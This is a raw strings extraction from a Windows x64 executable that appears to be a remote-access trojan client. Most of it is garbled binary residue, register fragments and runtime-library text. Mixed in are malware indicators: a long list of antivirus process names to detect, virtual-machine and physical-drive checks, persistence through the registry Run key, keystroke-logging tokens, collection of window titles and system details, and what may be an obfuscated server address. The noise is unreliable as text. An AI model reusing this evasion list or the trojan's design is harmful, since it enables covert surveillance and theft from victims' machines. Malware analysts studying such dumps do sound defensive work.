!This program cannot be run in DOS mode.
S<<B2RoB2RoB2Ro-D
oC2RoKJ
oC2Ro-D
oO2RoKJ
o@2RoKJ
oU2RoB2So@3Ro-D
oI2Ro-D
oC2Ro-D
oC2RoRichB2Ro
`.rdata
@.data
.pdata
@.rsrc
@.reloc
|$ ATH
WATAUH
A]A\_
\$@H9o
A]A\_
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@VWAUAVH
(A^A]_^
@USWATAWH
D$`CTXO
D$dPCon
D$hntio
D$ln_Cl
D$pass
A_A\_[]
@SUVWATH
A\_^][
@UVWATAUH
@A]A\_^]
t$ WATAUAVAWH
A_A^A]A\_
@SVWATAUH
A]A\_^[
|$ ATH
SVWATAUH
@A]A\_^[
L$0H9{
VWATAUAVH
0A^A]A\_^
t$ WATAUAVAWH
A_A^A]A\_
SVWATH
HA\_^[
WATAUH
0A]A\_
@SATAUAVH
(A^A]A\[
(A^A]A\[
Hcl$$H
@SWATAUAWH
PA_A]A\_[
@UWATH
@SUATAUAVH
A^A]A\][
@SUVWATH
A\_^][
@USVWATH
A\_^[]
SVWATH
@SUVWATAUAVH
fD9|$Pu)D
D9t$@w
A^A]A\_^][
\$0ffffff
WATAUAVAWH
uLIcE8
0A_A^A]A\_
@SUWAVAWH
l$hfA;X
YLffff
A_A^_][
@VAUAVH
0A^A]^
@SATAUAVH
XA^A]A\[
XA^A]A\[
XA^A]A\[
P0H+U0t
t2fffff
|$ ATAUAVH
0A^A]A\
@SATAUAVH
(A^A]A\[
(A^A]A\[
Hcl$$H
UATAUAVAWH
UATAUAVAWH
A_A^A]A\]
UVWATAUH
`A]A\_^]
WATAUAVAWH
PPD9=2
WATAUH
l$ VWATAUAVH
A^A]A\_^
D#K|L#
@WATAUH
|$ D+p
0A]A\_
0A]A\_
0A]A\_
WATAUH
CLD#C|L#
CLD#C|L#
A]A\_
WATAUAVAWH
CLD#C|L#
D#K|M#
A_A^A]A\_
|$ ATH
s@9s(t%
C09p<t
c(D+k8A
ffffff
C(9p<t
C(9p<t
C0H9p
C09p<t
C09p<t
C0H9p0
C09p<t
C09p<t
C09p<tN
[,9s(@
@SUWATAVH
A^A\_][
Q H9Q0u
L9fPtcL9f`t]L9fhtWM
A^A\_][
A^A\_][
i H9i0u
NP;H(s
NP;H8s
nHu(;{
A;N8v"A
E;n$t8H
@SUVWH
\$Hfff
LcL$@I+
ffffff
|$ ATAUAVH
A^A]A\
ffffff
t!fffffff
t.fffffff
asm686 with masm, optimised assembly code from Brian Raiter, written 1998, converted to amd 64 by Gilles Vollant 2005
t.ffff
USVWATAUAVH
A^A]A\_^[]
H+D$(A;
H9|$(t
\$ ATH
D9!v=H
|$ ATH
|$ ATH
~\ffffff
|$ ATH
|$ ATH
~\ffffff
D9/~vH
;C(uPH
SUVWATAUAVAWH
xA_A^A]A\_^][
|$ ATH
l$ VWATH
\$ UVWH
H;?tDfff
H;?tDfff
H;?tDfff
H;?tDfff
@VWAUH
@UWATH
|$ ATH
C\H;?tfE3
C<9CdsPH
CDD9SDv
SVATAVH
L$ 9Kp
D$(ffff
SLD;Stx5
D;w0xY
A^A\^[
AT;QTx
@SUVAUH
(A]^][
(A]^][
|$P9CdL
C<9CdsKH
K<9Kds
(A]^][
(A]^][
WATAUH
D+A0D;
Q0+Q(;
|$ ATH
@UVATH
|$ ATH
|$ ATH
H9s`tG;{ht1H
@SUWATAUH
\$(L9\$ t
A]A\_][
t$ ATH
D$ t,
|$ ATH
ffffff
H9sXtG;{`t1H
@SUWATAUH
\$(L9\$ t
A]A\_][
G0D+G(E3
@WATAUAVAWH
@A_A^A]A\_
t$ ATH
D$ t,
@UATAUAVAWH
e@A_A^A]A\]
|$ ATH
@WATAUH
PA]A\_
@VWATH
VWATAUAVH
E9l$0u$
A^A]A\_^
@WATAUH
uPD;f,u0;~(
0A]A\_
UVWATAUAVAWH
pA_A^A]A\_^]
fffffff
fffffff
ATAUAVH
A^A]A\
t$ WATAUH
0A]A\_
l$ WATAUH
A]A\_
@UATAVH
x ATAUAWH
A_A]A\
L9d$`t
UVWATAUAVAWH
A_A^A]A\_^]
t$ WATAUAVAWH
A_A^A]A\_
p WATAUH
A]A\_
WATAUH
A]A\_
@USVWATAUAVAWH
A_A^A]A\_^[]
UATAUH
\$ UVWATAUAVAWH
!|$DHc
|$DD9d$X
f;D$@ug
f;D$@uD
H!\$ H
HcD$HH;
H!\$ H
HcD$HH;
H!|$ L
A_A^A]A\_^]
VWATAUAVH
A^A]A\_^
ATAUAWH
0A_A]A\
WATAUAVAWH
A_A^A]A\_
t$ WATAUH
WATAUH
A]A\_
WATAUAVAWH
@A_A^A]A\_
UVWATAUH
D$&8\$&t-8X
@A]A\_^]
ATAUAVH
fD9t$b
A^A]A\
x ATAUAVH
A^A]A\
Hct$@H
s\HcL$HH
SVWATAUAVAWH
0A_A^A]A\_^[
WATAUAVAWH
A_A^A]A\_
@SVWATAUAVAWH
L!l$HL!l$@
D$PL9oXt
D$8HcH
A_A^A]A\_^[
ATAUAVH
0A^A]A\
VWATAUAVH
A^A]A\_^
UVWATAUAVAWH
`A_A^A]A\_^]
UVWATAUAVAWH
E9,$~T3
A_A^A]A\_^]
WATAVH
@A^A\_
x ATAUAWH
A_A]A\
D8d$Ht
@SUVWH
UATAUAVAWH
gfffffffH
A_A^A]A\]
@8|$8t
@8t$8t
@SUVWH
@SUVWATH
A\_^][
UVWATAUAVAWH
T$pfE;"
{t-fA92
T$pfA;
T$pfD;
t$8fE9"
t$89L$\t
8T$4utM
|$@fD;
\$L9|$\t
\$L@8|$Dt
D8t$4u$
D8t$5t
MfE;"u
l$xD8u
A_A^A]A\_^]
UVWATAUAVAWH
D$DD9T$\
t$hD+d$DD+
9D$Pti
A_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
VWATAUAVH
xv;=[N
A^A]A\_^
l$ VWATH
9\$ ~>H
D8"u%H
UVWATAUAVAWH
A_A^A]A\_^]
LcA<E3
@SUVWATAUAVH
PA^A]A\_^][
@UATAUAVAWH
!t$(H!t$ A
A_A^A]A\]
@UATAUAVAWH
A_A^A]A\]
@USVWH
l$ VWATAUAWH
L$$fA;
u 9w$r
t5f9(t
A_A]A\_^
L$ UVWH
\$ UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
`A_A^A]A\_^]
UVWATAUAVAWH
`A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
WATAVH
USVWATAUAVAWH
XA_A^A]A\_^[]
WATAUAVAWH
A_A^A]A\_
L$0H9_
USVWATAUH
A]A\_^[]
H(H9J(u
Q1.2.11
deflate 1.2.11 Copyright 1995-2017 Jean-loup Gailly and Mark Adler
1.2.11
incorrect length check
incorrect data check
invalid distance too far back
invalid distance code
invalid literal/length code
invalid distances set
invalid literal/lengths set
invalid bit length repeat
invalid code -- missing end-of-block
too many length or distance symbols
invalid code lengths set
invalid stored block lengths
invalid block type
header crc mismatch
unknown header flags set
incorrect header check
invalid window size
unknown compression method
Qkkbal
[-&LMb#{'
w+OQvr
IN SKyu
)\ZEo^m/
H*0"ZOW
mj>zjZ
IiGM>nw
ewh/?y
OZw3(?
V_:X1:
incompatible version
buffer error
insufficient memory
data error
stream error
file error
stream end
need dictionary
inflate 1.2.11 Copyright 1995-2017 Mark Adler
bad allocation
CTcpPackClientT<class CTcpClient>::CheckParams
CreateFileTransactedW
[RO] %ld bytes
input wins: %lu
input probe
input psh: sn=%lu ts=%lu
input ack: sn=%lu rtt=%ld rto=%ld
[RI] %d bytes
recv sn=%lu
%s --> Error: %d, EC: %d
<C-CNNID: %Iu> OnReceive() event return 'HR_ERROR', connection will be closed !
<C-CNNID: %Iu> OnSend() event should not return 'HR_ERROR' !!
---------------> Client Worker Thread 0x%08X stoped <---------------
---------------> Client Worker Thread 0x%08X started <---------------
<C-CNNID: %Iu> send 0 bytes (detect package)
<C-CNNID: %Iu> recv 0 bytes (detect package)
Unknown exception
CorExitProcess
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
bad exception
(null)
`h````
xpxxxx
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__eabi
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
`h`hhh
xppwpp
1#QNAN
1#SNAN
generic
iostream
system
iostream stream error
Visual C++ CRT: Not enough memory to complete call to strerror.
Illegal byte sequence
Directory not empty
Function not implemented
No locks available
Filename too long
Resource deadlock avoided
Result too large
Domain error
Broken pipe
Too many links
Read-only file system
Invalid seek
No space left on device
File too large
Inappropriate I/O control operation
Too many open files
Too many open files in system
Invalid argument
Is a directory
Not a directory
No such device
Improper link
File exists
Resource device
Unknown error
Bad address
Permission denied
Not enough space
Resource temporarily unavailable
No child processes
Bad file descriptor
Exec format error
Arg list too long
No such device or address
Input/output error
Interrupted function call
No such process
No such file or directory
Operation not permitted
No error
>f:yhV:
>f:yhV:
SHGetSpecialFolderPathW
RegQueryValueExW
RegOpenKeyExW
RegCloseKey
CTXOPConntion_Class
Software\Tencent\Plugin\VAS
GetNativeSystemInfo
RtlGetNtVersionNumbers
RtlGetVersion
C:\Program Files\VMware\VMware Tools\
\\.\PhysicalDrive0
invalid string position
string too long
0123456789abcdef
RegCreateKeyExW
RegSetValueExW
RegDeleteKeyW
RegDeleteValueW
RegEnumValueW
RegEnumKeyExW
g>N1Y%
InternetOpenW
InternetOpenUrlW
InternetReadFile
InternetCloseHandle
vector<T> too long
_nextafter
_hypot
C:\Users\
\Desktop\2022
gfi\cangku\WinOsClientProject\x64\Release\
InitializeCriticalSection
VirtualFree
DeleteCriticalSection
EnterCriticalSection
LeaveCriticalSection
VirtualAlloc
lstrlenW
MultiByteToWideChar
GetCurrentProcessId
GetLocalTime
GetLocaleInfoW
GetSystemDirectoryW
lstrcatW
GetTickCount
lstrcmpW
GetModuleHandleW
GetConsoleWindow
CreateToolhelp32Snapshot
Process32FirstW
Process32NextW
CloseHandle
LoadLibraryW
GetProcAddress
CreateFileW
GetCurrentProcess
lstrcpyW
GetLastError
HeapAlloc
GetProcessHeap
HeapFree
OpenProcess
GetDriveTypeW
GetDiskFreeSpaceExW
GlobalMemoryStatusEx
GetSystemInfo
FreeLibrary
GetModuleFileNameW
GetCommandLineW
GetStartupInfoW
CreateProcessW
ExitProcess
WideCharToMultiByte
CreateFileA
DeviceIoControl
QueryPerformanceFrequency
CreateEventW
SetEvent
ResetEvent
QueryPerformanceCounter
WaitForSingleObject
WriteFile
ExpandEnvironmentStringsW
CopyFileW
GetFileAttributesW
CreateEventA
FormatMessageW
SetLastError
VirtualProtect
IsBadReadPtr
LoadLibraryA
GetNativeSystemInfo
SetErrorMode
SetUnhandledExceptionFilter
CreateThread
CreateMutexW
GetFileSize
DeleteFileW
ReleaseMutex
SetFilePointer
KERNEL32.dll
wsprintfW
GetForegroundWindow
GetWindowTextW
GetMonitorInfoW
EnumDisplayMonitors
GetLastInputInfo
SendMessageW
FindWindowA
GetWindowTextA
GetWindow
GetClassNameA
OpenWindowStationW
SetProcessWindowStation
IsWindow
USER32.dll
GetCurrentHwProfileW
RegOpenKeyExA
RegQueryInfoKeyW
RegEnumKeyExA
RegCloseKey
AllocateAndInitializeSid
CheckTokenMembership
FreeSid
OpenProcessToken
GetTokenInformation
LookupAccountSidW
RegOpenKeyExW
RegQueryValueExW
RegDeleteValueW
RegCreateKeyW
RegSetValueExW
ADVAPI32.dll
SHGetFolderPathW
SHELL32.dll
CoInitialize
CoCreateInstance
CoUninitialize
ole32.dll
OLEAUT32.dll
WS2_32.dll
InetNtopW
WSAIoctl
WSAStringToAddressW
freeaddrinfo
getaddrinfo
WSAResetEvent
WSAEventSelect
WSACloseEvent
WSACreateEvent
WSAEnumNetworkEvents
WSAWaitForMultipleEvents
PathIsDirectoryA
StrChrW
SHLWAPI.dll
NetWkstaGetInfo
NETAPI32.dll
DirectInput8Create
DINPUT8.dll
timeGetTime
timeBeginPeriod
timeGetDevCaps
timeEndPeriod
WINMM.dll
RaiseException
InitializeCriticalSectionAndSpinCount
GetCurrentThreadId
HeapCreate
HeapDestroy
CreateWaitableTimerW
MapViewOfFileEx
CreateFileMappingW
SwitchToThread
UnmapViewOfFile
lstrlenA
SetWaitableTimer
CancelWaitableTimer
TryEnterCriticalSection
DecodePointer
EncodePointer
ExitThread
HeapReAlloc
FlsSetValue
GetCommandLineA
RtlPcToFileHeader
RtlLookupFunctionEntry
RtlUnwindEx
TerminateProcess
UnhandledExceptionFilter
IsDebuggerPresent
RtlVirtualUnwind
RtlCaptureContext
HeapSetInformation
GetVersion
GetConsoleCP
GetConsoleMode
GetStdHandle
HeapSize
FlsGetValue
FlsFree
FlsAlloc
GetStringTypeW
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
SetHandleCount
GetFileType
GetModuleFileNameA
FreeEnvironmentStringsW
GetEnvironmentStringsW
GetSystemTimeAsFileTime
WriteConsoleW
SetStdHandle
FlushFileBuffers
LCMapStringW
ReadFile
LocalFree
DispatchMessageW
TranslateMessage
PeekMessageW
MsgWaitForMultipleObjects
GetInstallDetailsPayload
SignalChromeElf
Version
ngyixiugaidaochuhanshu
.?AVIClient@@
.?AVIArqClient@@
.?AVIPackClient@@
.?AVCAtlException@ATL@@
.?AVIUdpClient@@
.?AV?$CArqSessionT@VCUdpArqClient@@V1@@@
.?AVITcpClient@@
.?AVCTcpClient@@
.?AVCUdpClient@@
.?AVCUdpArqClient@@
.?AV?$CTcpPackClientT@VCTcpClient@@@@
.?AVtype_info@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_exception@std@@
.?AV_com_error@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVerror_category@std@@
.?AV_Generic_error_category@std@@
.?AV_Iostream_error_category@std@@
.?AV_System_error_category@std@@
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
.?AVCBuffer@@
.?AVexception@std@@
xiugaishiyong
mainsetting
.?AVbad_alloc@std@@
.?AV?$CHPObjectPtr@V?$DualInterface@VIPackClient@@VITcpClient@@@@VITcpClientListener@@UTcpPackClient_Creator@@@@
.?AVCTcpSocket@@
.?AVCTcpClientListener@@
.?AV?$ISocketListenerT@VITcpClient@@@@
.?AV?$IClientListenerT@VITcpClient@@@@
.?AVITcpClientListener@@
.?AVISocketBase@@
.?AVCManager@@
.?AVCKernelManager@@
.?AV?$CHPObjectPtr@V?$DualInterface@VIArqClient@@VIUdpClient@@@@VIUdpClientListener@@UUdpArqClient_Creator@@@@
.?AVCUdpSocket@@
.?AVCUdpClientListener@@
.?AV?$ISocketListenerT@VIUdpClient@@@@
.?AV?$IClientListenerT@VIUdpClient@@@@
.?AVIUdpClientListener@@
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
#+3;CScs
%d.%d.%d.%d%c
UNKNOWN ERROR
SSL environment not ready
Send Data Fail
Process Data Error
Network Error
Connect to Server Fail
Attach SOCKET to IOCP Fail
Create Detector Thread Fail
Create Worker Thread Fail
Create IOCP Fail
Listen SOCKET Fail
Prepare SOCKET Fail
Bind SOCKET Fail
Create SOCKET Fail
Invalid Parameter
Illegal State
SUCCESS
runtime error
TLOSS error
SING error
DOMAIN error
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
- abort() has been called
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
mscoree.dll
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
(null)
USER32.DLL
((((( H
h(((( H
H
CONOUT$
UnThreat
UnThreat.exe
K7TSecurity.exe
Ad-watch
ad-watch.exe
PSafeSysTray.exe
BitDefender
vsserv.exe
remupd.exe
rtvscan.exe
ashDisp.exe
avcenter.exe
TMBMSRV.exe
knsdtray.exe
egui.exe
Mcshield.exe
avp.exe
F-Secure
f-secure.exe
avgwdsvc.exe
AYAgent.aye
V3Svc.exe
Outpost
acs.exe
DR.WEB
SPIDer.exe
Comodo
cfp.exe
mssecess.exe
QuickHeal
QUHLPSVC.EXE
RavMonD.exe
KvMonXP.exe
baiduSafeTray.exe
BaiduSd.exe
HipsTray.exe
QQPCRTP.exe
KSafeTray.exe
kxetray.exe
360sd.exe
ZhuDongFangYu.exe
360tray.exe
360Tray.exe
360Safe.exe
ProcessorNameString
HARDWARE\DESCRIPTION\System\CentralProcessor\0
BEIZHU
%4d.%2d.%2d-%2d:%2d:%2d
%s %d %d %d %d
%s %d %d %d %d
%4d.%2d.%2d-%2d:%2d:%2d
GFIRestart64.exe
Shell32.dll
W%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ADVAPI32.dll
FriendlyName
NONE_MAPPED
%d Gb
%d Gb
%d Gb
%d Gb
DriverDesc
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
kernel32.dll
ntdll.dll
%d.%d.%d
XP-sp1
XP-sp2
XP-sp3
Vista-sp1
Vista-sp2
Win7-sp1
2008R2
Win8R1
2012R2
%s %d.%d.%d.%d.%d
VMwareService.exe
VMwareTray.exe
VMwareUser.exe
localhost
WORKGROUP
%s--%s
%s\shell\open\command
WinSta0\Default
wininet.dll
MSIE 6.0
winsta0
www.baidu.com
127.0.0.1
\sys.key
:]%d-%d-%d %d:%d:%d
[enter]
[lctrl]
[lshift]
[rshift]
[lalt]
[numlock]
[scrolllock]
[enter]
[rctrl]
[ralt]
[home]
[pagup]
[pagdn]
[lwin]
[rwin]
07.632.802.19
654321
07.632.802.19
654321
07.632.802.19
654321
2023. 6
127.0.0.1